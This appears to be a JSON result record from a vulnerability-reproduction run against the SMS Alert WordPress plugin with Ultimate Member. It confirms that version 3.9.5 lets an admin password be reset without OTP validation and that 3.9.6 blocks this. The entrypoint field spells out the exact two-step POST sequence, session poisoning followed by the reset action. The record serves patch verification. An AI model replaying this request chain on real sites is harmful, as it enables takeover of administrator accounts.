{
  "entrypoint_kind": "api_remote",
  "entrypoint_detail": "UltimateMember password-reset page (?page_id=<um_pwd_page>) POST _um_password_reset=1&username_b=<admin> fires um_reset_password_process_hook -> SMSAlert smsalertUmResetPwdSubmitted() poisons $_SESSION['user_login']; then POST ?option=smsalert-um-reset-pwd-action&smsalert_user_newpwd=<pwd>&smsalert_user_cnfpwd=<pwd> -> UltimateMember::handleForm() -> handleSmsalertChangedPwd() -> reset_password($admin,$pwd) without OTP validation",
  "service_started": true,
  "healthcheck_passed": true,
  "target_path_reached": true,
  "runtime_stack": ["mariadb","php-builtin-server","wordpress","woocommerce","ultimate-member","sms-alert-3.9.5"],
  "proof_artifacts": [
    "logs/vuln_variant_reproduction.log",
    "logs/vv_vuln_step1.html","logs/vv_vuln_step1_headers.txt",
    "logs/vv_vuln_step2.html","logs/vv_vuln_step2_headers.txt","logs/vv_vuln_cookies.txt",
    "logs/vv_fixed_step1.html","logs/vv_fixed_step1_headers.txt",
    "logs/vv_fixed_step2.html","logs/vv_fixed_step2_headers.txt","logs/vv_fixed_cookies.txt",
    "logs/vv-php-server.log"
  ],
  "vulnerable_3_9_5_um_variant_success": true,
  "patched_3_9_6_um_attack_blocked": true,
  "outcome": "alternate_trigger_not_bypass",
  "notes": "UM entry point is a materially different trigger for the same root-cause sink (missing OTP-validation check before reset_password). Reproduced on vulnerable 3.9.5 (HTTP 302 to ?sa_um_reset_pwd=1; admin password changed); blocked on patched 3.9.6 (HTTP 200, no redirect; password unchanged). ALTERNATE TRIGGER, not a bypass. Timestamp: 2026-07-05T11:00:28Z"
}
